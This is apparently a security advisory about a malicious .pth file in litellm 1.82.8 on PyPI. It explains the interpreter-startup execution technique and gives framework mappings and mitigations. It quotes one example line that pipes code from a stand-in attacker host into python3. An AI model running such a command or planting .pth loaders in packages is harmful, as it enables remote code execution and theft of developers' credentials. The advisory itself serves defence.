Overview
A confirmed supply chain compromise has been identified in litellm version 1.82.8, published to the Python Package Index (PyPI). Litellm is a widely adopted open-source library that provides a unified interface for calling APIs across dozens of large language model providers including OpenAI, Anthropic, Cohere, and others. Its prevalence in LLM-powered applications, AI agents, and developer tooling makes this compromise particularly significant. The malicious payload was embedded in a .pth file that Python automatically executes at interpreter startup — requiring no explicit import of the library by the victim.
Technical Analysis
The attack vector exploits a largely underappreciated Python behaviour: .pth files placed in site-packages directories are processed by the Python interpreter on every startup via the site module. The malicious file, litellm_init.pth (34,628 bytes), was bundled inside the wheel distribution and would execute its payload silently regardless of whether the developer ever called import litellm.
# Example of how a malicious .pth file can execute arbitrary code
import os; os.system('curl -s http://attacker.example/payload | python3')
This technique allows an attacker to achieve persistent code execution across any Python environment where the package is installed — including CI/CD pipelines, developer workstations, and production inference servers. The size of the payload (34 KB) suggests non-trivial malicious functionality, potentially including credential harvesting, reverse shells, or API key exfiltration targeting LLM provider credentials stored in environment variables.
Framework Mapping
MITRE ATLAS:
- AML.T0010 – ML Supply Chain Compromise: The core technique. An adversary tampered with a published ML-adjacent software package to introduce malicious code.
- AML.T0018 – Backdoor ML Model: While not directly targeting model weights, the compromise of litellm could facilitate persistent access to LLM inference pipelines.
- AML.T0047 – ML-Enabled Product or Service: Litellm underpins a wide range of LLM-enabled products, amplifying the blast radius of this attack.
OWASP LLM Top 10:
- LLM05 – Supply Chain Vulnerabilities: A textbook example of third-party package compromise affecting the LLM application ecosystem.
- LLM06 – Sensitive Information Disclosure: LLM API keys, model configurations, and inference data are at risk of exfiltration through the injected payload.
Impact Assessment
Any organisation or developer who installed litellm==1.82.8 is potentially compromised. The affected population includes AI startups, enterprise LLM application teams, and open-source project maintainers. Environments storing LLM provider API keys (OpenAI, Anthropic, etc.) in environment variables are at elevated risk of credential theft. CI/CD pipelines that install packages from PyPI without hash pinning or integrity verification are also exposed.
Mitigation & Recommendations
- Audit installations: Check all environments for litellm==1.82.8 and remove immediately. Upgrade to a verified clean version.
- Rotate API keys: Any LLM provider credentials present in affected environments should be considered compromised and rotated without delay.
- Implement SBOM tracking: Maintain a Software Bill of Materials for all Python dependencies to accelerate detection of future compromises.
- Adopt SLSA and Sigstore: Enforce provenance verification on PyPI packages using Sigstore signatures and SLSA attestations where available.
- Pin dependencies with hash verification: Use
pip install --require-hashesor tools likepip-auditandpipenvwith lock files to detect integrity violations. - Scan for .pth files: Audit site-packages directories for unexpected
.pthfiles as a post-incident detection measure.